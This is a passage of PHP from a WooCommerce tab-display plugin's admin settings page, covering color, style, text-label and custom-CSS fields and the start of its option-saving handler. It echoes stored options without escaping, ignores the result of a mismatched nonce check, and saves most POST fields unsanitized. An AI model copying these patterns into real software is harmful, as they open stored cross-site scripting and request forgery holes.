                        <p><?php esc_html_e( 'Category Filters Font Color:', 'woo-tabbed-category' ); ?></p>
                        <input type="text" name="product_category_text_font_color"
                               value="<?php echo get_option('product_category_text_font_color'); ?>"
                               class="container-bg-color">
                    </div>
                    <div class="admin_display_list_3">
                        <p><?php esc_html_e( 'Category filters button color for active button:', 'woo-tabbed-category' ); ?></p>
                        <input type="text" name="product_category_button_active_color"
                               value="<?php echo get_option('product_category_button_active_color'); ?>"
                               class="container-bg-color">
                    </div>
                    <div class="admin_display_list_3">
                        <p><?php esc_html_e( 'Category filters button color:', 'woo-tabbed-category' ); ?></p>
                        <input type="text" name="product_category_filter_button_color"
                               value="<?php echo get_option('product_category_filter_button_color'); ?>"
                               class="container-bg-color">
                    </div>
                    <div class="admin_display_list_3">
                        <p><?php esc_html_e( 'Category filters button color on hover:', 'woo-tabbed-category' ); ?></p>
                        <input type="text" name="product_category_filter_button_color_hover"
                               value="<?php echo get_option('product_category_filter_button_color_hover'); ?>"
                               class="container-bg-color">
                    </div>
                    <div class="admin_display_list_3">
                        <p><?php esc_html_e( 'Product Rating color:', 'woo-tabbed-category' ); ?></p>
                        <input type="text" name="product_ratting_color"
                               value="<?php echo get_option('product_ratting_color'); ?>"
                               class="container-bg-color">
                    </div>
                    <div class="admin_display_list_3">
                        <p><?php esc_html_e( 'Add to cart button color:', 'woo-tabbed-category' ); ?></p>
                        <input type="text" name="product_add_to_cart_button_color"
                               value="<?php echo get_option('product_add_to_cart_button_color'); ?>"
                               class="container-bg-color">
                    </div>


                    <div class="admin_display_list_3">

                        <p><?php esc_html_e( 'Category filters border color:', 'woo-tabbed-category' ); ?></p>
                        <input type="text" name="category_filters_border_color"
                               value="<?php echo get_option('category_filters_border_color'); ?>"
                               class="container-bg-color">

                    </div>

                    <div class="admin_display_list_3">

                        <p><?php esc_html_e( 'Dropdown menu font color:', 'woo-tabbed-category' ); ?></p>
                        <input type="text" name="qcld_dropdown_menu_font_color"
                               value="<?php echo get_option('qcld_dropdown_menu_font_color'); ?>"
                               class="container-bg-color">

                    </div>

                    <div class="admin_display_list_3">

                        <p><?php esc_html_e( 'Dropdown menu background color:', 'woo-tabbed-category' ); ?></p>
                        <input type="text" name="qcld_dropdown_menu_background_color"
                               value="<?php echo get_option('qcld_dropdown_menu_background_color'); ?>"
                               class="container-bg-color">

                    </div>

                    <div class="admin_display_list_3">

                        <p><?php esc_html_e( 'Dropdown Active menu border Color:', 'woo-tabbed-category' ); ?></p>
                        <input type="text" name="qcld_dropdown_active_menu_background_color"
                               value="<?php echo get_option('qcld_dropdown_active_menu_background_color'); ?>"
                               class="container-bg-color">

                    </div>
                </section>


                <input id="toggle5" type="radio" name="toggle"/>
                <label for="toggle5"><?php esc_html_e( 'Select Style', 'woo-tabbed-category' ); ?></label>
                <section id="content5" class="wo_tabs_inner">
                    <div class="qc_select_theme">
                        <input id="tab1" type="radio" name="tabs" checked>
                        <label for="tab1"><?php esc_html_e( 'Tabs style', 'woo-tabbed-category' ); ?></label>
                        <input id="tab2" type="radio" name="tabs">
                        <label for="tab2"><?php esc_html_e( 'Accordion style', 'woo-tabbed-category' ); ?></label>
                        <input id="tab3" type="radio" name="tabs">
                        <label for="tab3"><?php esc_html_e( 'Carousel style', 'woo-tabbed-category' ); ?></label>
                        <input id="tab4" type="radio" name="tabs">
                        <label for="tab4"><?php esc_html_e( 'Showcase style', 'woo-tabbed-category' ); ?></label>
                        <section id="content1">
                            <ul class="qcld-theme-list" style="width: 100%;">
                                <li>
                                    <input type="radio" name="tabbed_theme" <?php echo(get_option('tabbed_theme') == 'one' ? 'checked' : ''); ?>
                                           value="one">
                                    <?php esc_html_e( 'Style one', 'woo-tabbed-category' ); ?><code><strong>[wtcpl-product-cat theme="one"]</strong></code> <img
                                            src="<?php echo QC_WOO_TAB_IMAGE_URL; ?>/1.jpg" alt=""></li>
                                <li>
                                    <input type="radio"
                                           name="tabbed_theme" <?php echo(get_option('tabbed_theme') == 'two' ? 'checked' : ''); ?>
                                           value="two">
                                    <?php esc_html_e( 'Style two', 'woo-tabbed-category' ); ?><code><strong>[wtcpl-product-cat theme="two"]</strong></code> <img
                                            src="<?php echo QC_WOO_TAB_IMAGE_URL; ?>/2.jpg" alt=""></li>
                                <li>
                                    <input type="radio"
                                           name="tabbed_theme" <?php echo(get_option('tabbed_theme') == 'three' ? 'checked' : ''); ?>
                                           value="three">
                                    <?php esc_html_e( 'Style three', 'woo-tabbed-category' ); ?> <code><strong>[wtcpl-product-cat theme="three"]</strong></code> <img
                                            src="<?php echo QC_WOO_TAB_IMAGE_URL; ?>/3.jpg" alt=""></li>
                                <li>
                                    <input type="radio"
                                           name="tabbed_theme" <?php echo(get_option('tabbed_theme') == 'five' ? 'checked' : ''); ?>
                                           value="five">
                                    <?php esc_html_e( 'Style Five', 'woo-tabbed-category' ); ?> <code><strong>[wtcpl-product-cat theme="five"]</strong></code> <img
                                            src="<?php echo QC_WOO_TAB_IMAGE_URL; ?>/5.jpg" alt=""></li>
                                <li>
                                    <input type="radio"
                                           name="tabbed_theme" <?php echo(get_option('tabbed_theme') == 'six' ? 'checked' : ''); ?>
                                           value="six">
                                    <?php esc_html_e( 'Style Six', 'woo-tabbed-category' ); ?> <code><strong>[wtcpl-product-cat theme="six"]</strong></code> <img
                                            src="<?php echo QC_WOO_TAB_IMAGE_URL; ?>/6.jpg" alt=""></li>
                                <li>
                                    <input type="radio"
                                           name="tabbed_theme" <?php echo(get_option('tabbed_theme') == 'seven' ? 'checked' : ''); ?>
                                           value="seven">
                                    <?php esc_html_e( 'Style Seven', 'woo-tabbed-category' ); ?> <code><strong>[wtcpl-product-cat theme="seven"]</strong></code> <img
                                            src="<?php echo QC_WOO_TAB_IMAGE_URL; ?>/7.jpg" alt=""></li>
                                <li>
                                    <input type="radio"
                                           name="tabbed_theme" <?php echo(get_option('tabbed_theme') == 'eight' ? 'checked' : ''); ?>
                                           value="eight">
                                    <?php esc_html_e( 'Style Eight', 'woo-tabbed-category' ); ?> <code><strong>[wtcpl-product-cat theme="eight"]</strong></code> <img
                                            src="<?php echo QC_WOO_TAB_IMAGE_URL; ?>/8.jpg" alt=""></li>
                                <li>
                                    <input type="radio"
                                           name="tabbed_theme" <?php echo(get_option('tabbed_theme') == 'nine' ? 'checked' : ''); ?>
                                           value="nine">
                                    <?php esc_html_e( 'Style Nine', 'woo-tabbed-category' ); ?> <code><strong>[wtcpl-product-cat theme="nine"]</strong></code> <img
                                            src="<?php echo QC_WOO_TAB_IMAGE_URL; ?>/9.jpg" alt=""></li>
                                <li>
                                    <input type="radio"
                                           name="tabbed_theme" <?php echo(get_option('tabbed_theme') == 'default' ? 'checked' : ''); ?>
                                           value="default">
                                    <?php esc_html_e( 'Theme Default', 'woo-tabbed-category' ); ?> <code><strong>[wtcpl-product-cat theme="default"]</strong></code> <img
                                            src="<?php echo QC_WOO_TAB_IMAGE_URL; ?>/woo-default.jpg" alt=""></li>
                            </ul>
                        </section>
                        <section id="content2">
                            <ul class="qcld-theme-list" style="width: 100%;">
                                <li>
                                    <input type="radio"
                                           name="tabbed_theme" <?php echo(get_option('tabbed_theme') == 'four' ? 'checked' : ''); ?>
                                           value="four">
                                    <?php esc_html_e( 'Style Four', 'woo-tabbed-category' ); ?> <code><strong>[wtcpl-product-cat theme="four"]</strong></code> <img
                                            src="<?php echo QC_WOO_TAB_IMAGE_URL; ?>/4.jpg" alt=""></li>


                                <li>
                                    <input type="radio"
                                           name="tabbed_theme"<?php echo(get_option('tabbed_theme') == 'eleven' ? 'checked' : ''); ?>
                                           value="eleven">
                                    <?php esc_html_e( 'Style Eleven', 'woo-tabbed-category' ); ?> <code><strong>[wtcpl-product-cat theme="eleven"]</strong></code> <img
                                            src="
                    <?php echo QC_WOO_TAB_IMAGE_URL;
                                            ?>/11.jpg" alt=""></li>


                            </ul>
                        </section>
                        <section id="content3">
                            <ul class="qcld-theme-list" style="width: 100%;">
                                <!-- <li>Coming Soon</li>-->
                                <li>
                                    <input type="radio"
                                           name="tabbed_theme" <?php echo(get_option('tabbed_theme') == 'ten' ? 'checked' : ''); ?>
                                           value="ten">
                                    <?php esc_html_e( 'Style Ten', 'woo-tabbed-category' ); ?> <code><strong>[wtcpl-product-cat theme="ten"]</strong></code> 
                                    <img src="<?php echo QC_WOO_TAB_IMAGE_URL; ?>/10.jpg" alt="">
                                </li>
                                <li>
                                    <input type="radio"
                                           name="tabbed_theme" <?php echo(get_option('tabbed_theme') == 'twelve' ? 'checked' : ''); ?>
                                           value="twelve">
                                    <?php esc_html_e( 'Style Twelve', 'woo-tabbed-category' ); ?> <code><strong>[wtcpl-product-cat theme="twelve"]</strong></code> 
                                    <img src="<?php echo QC_WOO_TAB_IMAGE_URL; ?>/12.png" alt="">
                                </li>
                            </ul>
                        </section>
                        <section id="content4">
                            <ul class="qcld-theme-list" style="width: 100%;">
                                <li>
                                    <input type="radio"
                                           name="tabbed_theme" <?php echo(get_option('tabbed_theme') == 'thirteen' ? 'checked' : ''); ?>
                                           value="thirteen">
                                    <?php esc_html_e( 'Style Thirteen', 'woo-tabbed-category' ); ?> <code><strong>[wtcpl-product-cat theme="thirteen"]</strong></code> 
                                    <img src="<?php echo QC_WOO_TAB_IMAGE_URL; ?>/13.png" alt="">
                                </li>
                            </ul>
                        </section>
                    </div>
                </section>
                <input id="toggle6" type="radio" name="toggle"/>
                <label for="toggle6"><?php esc_html_e( 'Language Center', 'woo-tabbed-category' ); ?></label>
                <section id="content6" class="wo_tabs_inner">
                    <div class="admin_display_list">
                        <p><?php esc_html_e( 'In Woo tab, products are added to cart via ajax. You can customize or override default
                            success message from here.', 'woo-tabbed-category' ); ?></p>
                        <br>
                        <textarea name="success_alert_message"
                                  class="form-control custom-global-css"
                                  cols="105"
                                  rows="2"><?php echo get_option('success_alert_message'); ?></textarea>
                    </div>
                    <div class="admin_display_list">
                        <p class="qc-opt-dcs-font"><?php esc_html_e( 'Change the alert message title text when a product is added to cart.
                            Leave in blank if you do not wish to change.', 'woo-tabbed-category' ); ?></p>
                        <br>
                        <textarea name="title_text"
                                  class="form-control custom-global-css"
                                  cols="105"
                                  rows="2"><?php echo get_option('title_text'); ?></textarea>
                    </div>
                    <div class="admin_display_list">
                        <p class="qc-opt-dcs-font"><?php esc_html_e( 'Here you can override the load more button text.', 'woo-tabbed-category' ); ?></p>
                        <textarea name="change_load_more_text"
                                  class="form-control custom-global-css"
                                  cols="105"
                                  rows="2"><?php echo get_option('change_load_more_text'); ?></textarea>
                    </div>
                    <div class="admin_display_list">
                        <p class="qc-opt-dcs-font"><?php esc_html_e( 'Change add to cart button text from here leave it blank if you do not
                            wish to change', 'woo-tabbed-category' ); ?></p>
                        <textarea name="change_add_to_cart_button_text"
                                  class="form-control custom-global-css"
                                  cols="105"
                                  rows="2"><?php echo get_option('change_add_to_cart_button_text'); ?></textarea>
                    </div>

                    <div class="admin_display_list">
                        <p class="qc-opt-dcs-font"><?php esc_html_e( 'Here you can override the All Category button text.', 'woo-tabbed-category' ); ?></p>
                        <textarea name="change_all_category_button_text"
                                  class="form-control custom-global-css"
                                  cols="105"
                                  rows="2"><?php echo get_option('change_all_category_button_text'); ?></textarea>
                    </div>

                    <div class="admin_display_list">
                        <p class="qc-opt-dcs-font"><?php esc_html_e( 'Change no product found text here. Leave it as it is if you do not
                            wish to change.', 'woo-tabbed-category' ); ?></p>
                        <textarea name="no_product_found_text"
                                  class="form-control custom-global-css"
                                  cols="105"
                                  rows="2"><?php _e(!empty(get_option('no_product_found_text')) ? get_option('no_product_found_text') : 'No product found!'); ?></textarea>
                    </div>

                    <div class="admin_display_list">
                        <p class="qc-opt-dcs-font"><?php esc_html_e( 'Hot', 'woo-tabbed-category' ); ?></p>
                        <textarea name="qcld_hot_deal_tab_lan_hot"
                                  class="form-control custom-global-css"
                                  cols="105"
                                  rows="2"><?php _e(!empty(get_option('qcld_hot_deal_tab_lan_hot')) ? get_option('qcld_hot_deal_tab_lan_hot') : 'Hot'); ?></textarea>
                    </div>

                    <div class="admin_display_list">
                        <p class="qc-opt-dcs-font"><?php esc_html_e( 'New', 'woo-tabbed-category' ); ?></p>
                        <textarea name="qcld_hot_deal_tab_lan_new"
                                  class="form-control custom-global-css"
                                  cols="105"
                                  rows="2"><?php _e(!empty(get_option('qcld_hot_deal_tab_lan_new')) ? get_option('qcld_hot_deal_tab_lan_new') : 'New'); ?></textarea>
                    </div>

                    <div class="admin_display_list">
                        <p class="qc-opt-dcs-font"><?php esc_html_e( 'Best Buy', 'woo-tabbed-category' ); ?></p>
                        <textarea name="qcld_hot_deal_tab_lan_best_buy"
                                  class="form-control custom-global-css"
                                  cols="105"
                                  rows="2"><?php _e(!empty(get_option('qcld_hot_deal_tab_lan_best_buy')) ? get_option('qcld_hot_deal_tab_lan_best_buy') : 'Best Buy'); ?></textarea>
                    </div>

                    <div class="admin_display_list">
                        <p class="qc-opt-dcs-font"><?php esc_html_e( 'Featured', 'woo-tabbed-category' ); ?></p>
                        <textarea name="qcld_hot_deal_tab_lan_feature"
                                  class="form-control custom-global-css"
                                  cols="105"
                                  rows="2"><?php _e(!empty(get_option('qcld_hot_deal_tab_lan_feature')) ? get_option('qcld_hot_deal_tab_lan_feature') : 'Featured'); ?></textarea>
                    </div>

                    <div class="admin_display_list">
                        <p class="qc-opt-dcs-font"><?php esc_html_e( 'Search for product', 'woo-tabbed-category' ); ?></p>
                        <textarea name="qcld_lan_search_for_product"
                                  class="form-control custom-global-css"
                                  cols="105"
                                  rows="2"><?php _e(!empty(get_option('qcld_lan_search_for_product')) ? get_option('qcld_lan_search_for_product') : 'Search for product'); ?></textarea>
                    </div>

                    <div class="admin_display_list">
                        <p class="qc-opt-dcs-font"><?php esc_html_e( 'Default sorting', 'woo-tabbed-category' ); ?></p>
                        <textarea name="qcld_lan_default_sorting"
                                  class="form-control custom-global-css"
                                  cols="105"
                                  rows="2"><?php _e(!empty(get_option('qcld_lan_default_sorting')) ? get_option('qcld_lan_default_sorting') : 'Default sorting'); ?></textarea>
                    </div>

                    <div class="admin_display_list">
                        <p class="qc-opt-dcs-font"><?php esc_html_e( 'Sort by popularity', 'woo-tabbed-category' ); ?></p>
                        <textarea name="qcld_lan_sort_by_popularity"
                                  class="form-control custom-global-css"
                                  cols="105"
                                  rows="2"><?php _e(!empty(get_option('qcld_lan_sort_by_popularity')) ? get_option('qcld_lan_sort_by_popularity') : 'Sort by popularity'); ?></textarea>
                    </div>

                    <div class="admin_display_list">
                        <p class="qc-opt-dcs-font"><?php esc_html_e( 'Sort by average rating', 'woo-tabbed-category' ); ?></p>
                        <textarea name="qcld_lan_sort_by_average_rating"
                                  class="form-control custom-global-css"
                                  cols="105"
                                  rows="2"><?php _e(!empty(get_option('qcld_lan_sort_by_average_rating')) ? get_option('qcld_lan_sort_by_average_rating') : 'Sort by average rating'); ?></textarea>
                    </div>

                    <div class="admin_display_list">
                        <p class="qc-opt-dcs-font"><?php esc_html_e( 'Sort by newness', 'woo-tabbed-category' ); ?></p>
                        <textarea name="qcld_lan_sort_by_newness"
                                  class="form-control custom-global-css"
                                  cols="105"
                                  rows="2"><?php _e(!empty(get_option('qcld_lan_sort_by_newness')) ? get_option('qcld_lan_sort_by_newness') : 'Sort by newness'); ?></textarea>
                    </div>

                    <div class="admin_display_list">
                        <p class="qc-opt-dcs-font"><?php esc_html_e( 'Sort by price: low to high', 'woo-tabbed-category' ); ?></p>
                        <textarea name="qcld_lan_sort_by_price_low_to_high"
                                  class="form-control custom-global-css"
                                  cols="105"
                                  rows="2"><?php _e(!empty(get_option('qcld_lan_sort_by_price_low_to_high')) ? get_option('qcld_lan_sort_by_price_low_to_high') : 'Sort by price: low to high'); ?></textarea>
                    </div>

                    <div class="admin_display_list">
                        <p class="qc-opt-dcs-font"><?php esc_html_e( 'Sort by price: high to low', 'woo-tabbed-category' ); ?></p>
                        <textarea name="qcld_lan_sort_by_price_high_to_low"
                                  class="form-control custom-global-css"
                                  cols="105"
                                  rows="2"><?php _e(!empty(get_option('qcld_lan_sort_by_price_high_to_low')) ? get_option('qcld_lan_sort_by_price_high_to_low') : 'Sort by price: high to low'); ?></textarea>
                    </div>


                    <div class="admin_display_list">
                        <p class="qc-opt-dcs-font"><?php esc_html_e( 'Cart Summary', 'woo-tabbed-category' ); ?></p>
                        <textarea name="qcld_lan_cart_summary"
                                  class="form-control custom-global-css"
                                  cols="105"
                                  rows="2"><?php _e(!empty(get_option('qcld_lan_cart_summary')) ? get_option('qcld_lan_cart_summary') : 'Cart Summary'); ?></textarea>
                    </div>


                    <br>
                    <br>
                </section>
                
                <input id="toggle7" type="radio" name="toggle"/>
                <label for="toggle7"><?php esc_html_e( 'Custom CSS', 'woo-tabbed-category' ); ?></label>
                <section id="content7" class="wo_tabs_inner wo_tabs_inner_css">
                    <p><?php esc_html_e( 'You can paste or write your custom css here', 'woo-tabbed-category' ); ?></p>
                    <textarea name="custom_global_css" class="form-control custom-global-css" cols="105" rows="20"><?php echo get_option('custom_global_css'); ?></textarea>
                   
                </section>
                <input id="toggle8" type="radio" name="toggle"/>
                <label for="toggle8"><?php esc_html_e( 'Support', 'woo-tabbed-category' ); ?></label>
                <section id="content8" class="wo_tabs_inner">
                    <?php echo qcld_woo_tabbed_promo_support_page_callback_func(); ?>
                  
                </section>
                <input id="toggle9" type="radio" name="toggle"/>
                <label for="toggle9"><?php esc_html_e( 'Wholesale Addon', 'woo-tabbed-category' ); ?></label>
                <section id="content9" class="wo_tabs_inner">
                    <div class="qcld_woo_tabbed_wholessale_woo_wrap">
                        <div class="qcld_woo_tabbed_wholessale_woo">
                            <a href="<?php echo esc_url('https://www.quantumcloud.com/products/wholesale-plugin-for-woocommerce/'); ?>" target="_blank"><img src="<?php echo QC_WOO_TAB_IMAGE_URL; ?>/wholesale-woocommerce-plugin.png" alt=""></a>
                            <p><?php esc_html_e( 'Increase sales on your Woocommerce shop with the Wholesale addon. Provides useful features like Role Based Pricing, Dynamic Pricing and discounts based on Weight, Quantity, Price, Total Units and Number of items and Minimum Maximum Quantity for checkout.', 'woo-tabbed-category' ); ?></p>
                            <p><a href="<?php echo esc_url('https://www.quantumcloud.com/products/wholesale-plugin-for-woocommerce/'); ?>" target="_blank"><?php esc_html_e( 'Get it Now!', 'woo-tabbed-category' ); ?> </a></p>
                        </div>
                    </div>
                </section>
                <input id="toggle10" type="radio" name="toggle"/>
                <label for="toggle10"><?php esc_html_e( 'Preferance', 'woo-tabbed-category' ); ?></label>
                <section id="content10" class="wo_tabs_inner">
                    <?php echo apply_filters('qcld_woo_tabbed_performance_settings',10  ); ?>
                </section>
            </div>
            <?php wp_nonce_field('woo-tab'); ?>
            <div class="admin_cus_btn1">
                <input type="submit" class="btn btn-primary submit-button" name="submit"
                       id="submit" value="<?php _e('Save Settings', 'woo-tabbed-category'); ?>"/>
            </div>


            <div class="admin_cus_btn1">
                <input type="button" class="btn btn-warning submit-button"
                       id="woo-rest-all-options-default"
                       value="<?php _e('Reset all options to Default', 'woo-tabbed-category'); ?>"/>
            </div>

            <div class="admin_cus_btn1 admin_qc_convertion_tracker">
               
            </div>


        </form>
    <?php }


    public function admin_menu()
    {

       /* add_submenu_page('woocommerce',
            __('Woo Tabbed Pro', 'woo-tabbed-category'),
            __('Woo Tabbed Pro', 'woo-tabbed-category'),
            'manage_woocommerce',
            $this->id,
            array($this, 'admin_page'));*/

         add_menu_page(
            __('Woo Tabbed Pro', 'woo-tabbed-category'),
            __('Woo Tabbed Pro', 'woo-tabbed-category'),
            'manage_options',
            $this->id,
            array($this, 'admin_page'),
            'dashicons-cart',
            20
        );


    }


    function woo_tab_save_options()
    {


        global $woocommerce;
        if (isset($_POST['_wpnonce']) && $_POST['_wpnonce']) {


            wp_verify_nonce($_POST['_wpnonce'], 'woo-tabbed-category');


            // Check if the form is submitted or not if(isset($_GET['page']) && $_GET['page']=='woo-tab'){

            if ( (isset($_GET['page']) && $_GET['page']=='woo-tab') && isset($_POST['submit'])) {

                $custom_global_css = $_POST['custom_global_css'];
                $product_number = $_POST['product_number'];
                $hot_deals_product_number = $_POST['hot_deals_product_number'];
                $qcld_category_top_tooltip_show = $_POST['qcld_category_top_tooltip_show'];
                $qcld_product_search_box_for_quick_search = $_POST['qcld_product_search_box_for_quick_search'];
                $qcld_product_search_box_each_category = $_POST['qcld_product_search_box_each_category'];

                $display_price = $_POST['display_price'];
                $display_rating = $_POST['display_rating'];
                $product_title = $_POST['product_title'];
                $add_cart_link = $_POST['add_cart_link'];
                $add_quantity_select = $_POST['add_quantity_select'];
                $success_alert_message = $_POST['success_alert_message'];
                $title_text = $_POST['title_text'];
                $change_load_more_text = $_POST['change_load_more_text'];
                $change_all_category_button_text = $_POST['change_all_category_button_text'];
                $container_background_color = $_POST['container_background_color'];
                $product_title_text_color = $_POST['product_title_text_color'];
                $max_char_per_cat = $_POST['max_char_per_cat'];
                $change_title_text_size = $_POST['change_title_text_size'];
                $product_content_text_size = $_POST['product_content_text_size'];


                if (isset($_POST['category_order'])) {
                    update_option('category_order', $_POST['category_order']);
                }

                if (isset($_POST['selected_categories'])) {
                    update_option('selected_categories', serialize($_POST['selected_categories']));
                }


                if (isset($_POST['product_box_hover_color'])) {
                    update_option('product_box_hover_color', $_POST['product_box_hover_color']);
                }


                if (isset($_POST['product_price_font_color'])) {
                    update_option('product_price_font_color', $_POST['product_price_font_color']);
                }

                if (isset($_POST['product_price_font_size'])) {
                    update_option('product_price_font_size', $_POST['product_price_font_size']);
                }

                if (isset($_POST['show_all']) == 1) {
                    update_option('show_all', $_POST['show_all']);
                } else {
                    update_option('show_all', 0);
                }


                // upload custom jarvis icon
                // $woo_tab_custom_icon_path = $_POST['woo_tab_custom_icon_path'];
                //  update_option('woo_tab_custom_icon_path', sanitize_text_field($woo_tab_custom_icon_path));


                $tabbed_theme = $_POST['tabbed_theme'];


                $qc_product_sort_type = $_POST['qc_product_sort_type'];
                $qc_product_sort_order = $_POST['qc_product_sort_order'];

                $no_product_found_text = sanitize_text_field($_POST['no_product_found_text']);


                $category_filters_border_color = $_POST['category_filters_border_color'];

                $category_style = $_POST['category_style'];
                update_option('category_style', $category_style);

                $thirteen_category_btn_mode = $_POST['thirteen_category_btn_mode'];
                update_option('thirteen_category_btn_mode', $thirteen_category_btn_mode);

                $thirteen_category_read_more_btn = $_POST['thirteen_category_read_more_btn'];
                update_option('thirteen_category_read_more_btn', $thirteen_category_read_more_btn);

                $thirteen_category_rm_max_word = $_POST['thirteen_category_rm_max_word'];
                update_option('thirteen_category_rm_max_word', $thirteen_category_rm_max_word);

                update_option('category_filters_border_color', $category_filters_border_color);
                update_option('no_product_found_text', $no_product_found_text);

                // New options starts from here

                $product_category_text_font_size = $_POST['product_category_text_font_size'];
                $product_category_text_font_color = $_POST['product_category_text_font_color'];
                $product_category_button_active_color = $_POST['product_category_button_active_color'];
                $product_ratting_color = $_POST['product_ratting_color'];


                $product_category_filter_button_color = $_POST['product_category_filter_button_color'];
                $product_category_filter_button_color_hover = $_POST['product_category_filter_button_color_hover'];
                $product_add_to_cart_button_color = $_POST['product_add_to_cart_button_color'];
                $product_content_text_color = $_POST['product_content_text_color'];
                $change_add_to_cart_button_text = sanitize_text_field($_POST['change_add_to_cart_button_text']);
                $qc_add_to_cart_type = $_POST['qc_add_to_cart_type'];
                $qc_slick_slider_on_off = $_POST['qc_slick_slider_on_off'];
                $qc_quick_view_on_off = $_POST['qc_quick_view_on_off'];
                $qc_quick_sorting_on_off = $_POST['qc_quick_sorting_on_off'];
                $qc_category_filter_fixed_on_off = $_POST['qc_category_filter_fixed_on_off'];
                $qc_woo_tabbed_cart_summary_style = $_POST['qc_woo_tabbed_cart_summary_style'];
                $qc_woo_tabbed_cart_summary_position = $_POST['qc_woo_tabbed_cart_summary_position'];
                $qc_woo_tabbed_cart_show_page = $_POST['qc_woo_tabbed_cart_show_page'];



                // New options start from here

                $qcld_hot_deal_tab_lan_hot = $_POST['qcld_hot_deal_tab_lan_hot'];
                update_option('qcld_hot_deal_tab_lan_hot', $qcld_hot_deal_tab_lan_hot);
                $qcld_hot_deal_tab_lan_new = $_POST['qcld_hot_deal_tab_lan_new'];
                update_option('qcld_hot_deal_tab_lan_new', $qcld_hot_deal_tab_lan_new);
                $qcld_hot_deal_tab_lan_best_buy = $_POST['qcld_hot_deal_tab_lan_best_buy'];
                update_option('qcld_hot_deal_tab_lan_best_buy', $qcld_hot_deal_tab_lan_best_buy);
                $qcld_hot_deal_tab_lan_feature = $_POST['qcld_hot_deal_tab_lan_feature'];
                update_option('qcld_hot_deal_tab_lan_feature', $qcld_hot_deal_tab_lan_feature);
                
                $qcld_lan_search_for_product = $_POST['qcld_lan_search_for_product'];
                update_option('qcld_lan_search_for_product', $qcld_lan_search_for_product);
                
                $qcld_lan_default_sorting = $_POST['qcld_lan_default_sorting'];
                update_option('qcld_lan_default_sorting', $qcld_lan_default_sorting);
                $qcld_lan_sort_by_popularity = $_POST['qcld_lan_sort_by_popularity'];
                update_option('qcld_lan_sort_by_popularity', $qcld_lan_sort_by_popularity);
                $qcld_lan_sort_by_average_rating = $_POST['qcld_lan_sort_by_average_rating'];
                update_option('qcld_lan_sort_by_average_rating', $qcld_lan_sort_by_average_rating);
                $qcld_lan_sort_by_newness = $_POST['qcld_lan_sort_by_newness'];
                update_option('qcld_lan_sort_by_newness', $qcld_lan_sort_by_newness);
                $qcld_lan_sort_by_price_low_to_high = $_POST['qcld_lan_sort_by_price_low_to_high'];
                update_option('qcld_lan_sort_by_price_low_to_high', $qcld_lan_sort_by_price_low_to_high);
                $qcld_lan_sort_by_price_high_to_low = $_POST['qcld_lan_sort_by_price_high_to_low'];
                update_option('qcld_lan_sort_by_price_high_to_low', $qcld_lan_sort_by_price_high_to_low);

                $qcld_lan_cart_summary = $_POST['qcld_lan_cart_summary'];
                update_option('qcld_lan_cart_summary', $qcld_lan_cart_summary);

                
                $qcld_dropdown_menu_font_color = $_POST['qcld_dropdown_menu_font_color'];
                update_option('qcld_dropdown_menu_font_color', $qcld_dropdown_menu_font_color);
                $qcld_dropdown_menu_background_color = $_POST['qcld_dropdown_menu_background_color'];
                update_option('qcld_dropdown_menu_background_color', $qcld_dropdown_menu_background_color);
                $qcld_dropdown_active_menu_background_color = $_POST['qcld_dropdown_active_menu_background_color'];
                update_option('qcld_dropdown_active_menu_background_color', $qcld_dropdown_active_menu_background_color);
                $qc_woo_tabbed_enable_dropdown_menu_tab = $_POST['qc_woo_tabbed_enable_dropdown_menu_tab'];
                update_option('qc_woo_tabbed_enable_dropdown_menu_tab', $qc_woo_tabbed_enable_dropdown_menu_tab);
                $qc_woo_tabbed_product_loading_style = $_POST['qc_woo_tabbed_product_loading_style'];
                update_option('qc_woo_tabbed_product_loading_style', $qc_woo_tabbed_product_loading_style);

                $qc_woo_tabbed_enable_theme_10_navbar_menu_tab = $_POST['qc_woo_tabbed_enable_theme_10_navbar_menu_tab'];
                update_option('qc_woo_tabbed_enable_theme_10_navbar_menu_tab', $qc_woo_tabbed_enable_theme_10_navbar_menu_tab);

                $qc_woo_tabbed_enable_category_image = $_POST['qc_woo_tabbed_enable_category_image'];
                update_option('qc_woo_tabbed_enable_category_image', $qc_woo_tabbed_enable_category_image);


                $qc_woo_tabbed_enable_product_tag_filter = $_POST['qc_woo_tabbed_enable_product_tag_filter'];
                update_option('qc_woo_tabbed_enable_product_tag_filter', $qc_woo_tabbed_enable_product_tag_filter);

                $qc_woo_tabbed_enable_cat_sub_cat_filter = $_POST['qc_woo_tabbed_enable_cat_sub_cat_filter'];
                update_option('qc_woo_tabbed_enable_cat_sub_cat_filter', $qc_woo_tabbed_enable_cat_sub_cat_filter);

                $qc_woo_tabbed_enable_related_product_replace = $_POST['qc_woo_tabbed_enable_related_product_replace'];
                update_option('qc_woo_tabbed_enable_related_product_replace', $qc_woo_tabbed_enable_related_product_replace);

                $qc_woo_tabbed_enable_product_alert_message_success = $_POST['qc_woo_tabbed_enable_product_alert_message_success'];
                update_option('qc_woo_tabbed_enable_product_alert_message_success', $qc_woo_tabbed_enable_product_alert_message_success);

                $qc_woo_tabbed_enable_product_alert_message_success_mobile = $_POST['qc_woo_tabbed_enable_product_alert_message_success_mobile'];

                update_option('qc_woo_tabbed_enable_product_alert_message_success_mobile', $qc_woo_tabbed_enable_product_alert_message_success_mobile);

                $qc_woo_tabbed_enable_product_variable_add_to_cart = $_POST['qc_woo_tabbed_enable_product_variable_add_to_cart'];

                update_option('qc_woo_tabbed_enable_product_variable_add_to_cart', $qc_woo_tabbed_enable_product_variable_add_to_cart);

                $qc_woo_tabbed_disable_product_out_of_stock = $_POST['qc_woo_tabbed_disable_product_out_of_stock'];

                update_option('qc_woo_tabbed_disable_product_out_of_stock', $qc_woo_tabbed_disable_product_out_of_stock);

                $qc_woo_tabbed_display_product_tag = $_POST['qc_woo_tabbed_display_product_tag'];

                update_option('qc_woo_tabbed_display_product_tag', $qc_woo_tabbed_display_product_tag);

                $qc_woo_tabbed_display_category_image_top = $_POST['qc_woo_tabbed_display_category_image_top'];

                update_option('qc_woo_tabbed_display_category_image_top', $qc_woo_tabbed_display_category_image_top);

                $qc_woo_tabbed_display_category_image_bg = $_POST['qc_woo_tabbed_display_category_image_bg'];

                update_option('qc_woo_tabbed_display_category_image_bg', $qc_woo_tabbed_display_category_image_bg);

                $qc_woo_tabbed_display_category_search_sort_top = $_POST['qc_woo_tabbed_display_category_search_sort_top'];

                update_option('qc_woo_tabbed_display_category_search_sort_top', $qc_woo_tabbed_display_category_search_sort_top);

                $qc_woo_tabbed_display_rtl_support = $_POST['qc_woo_tabbed_display_rtl_support'];

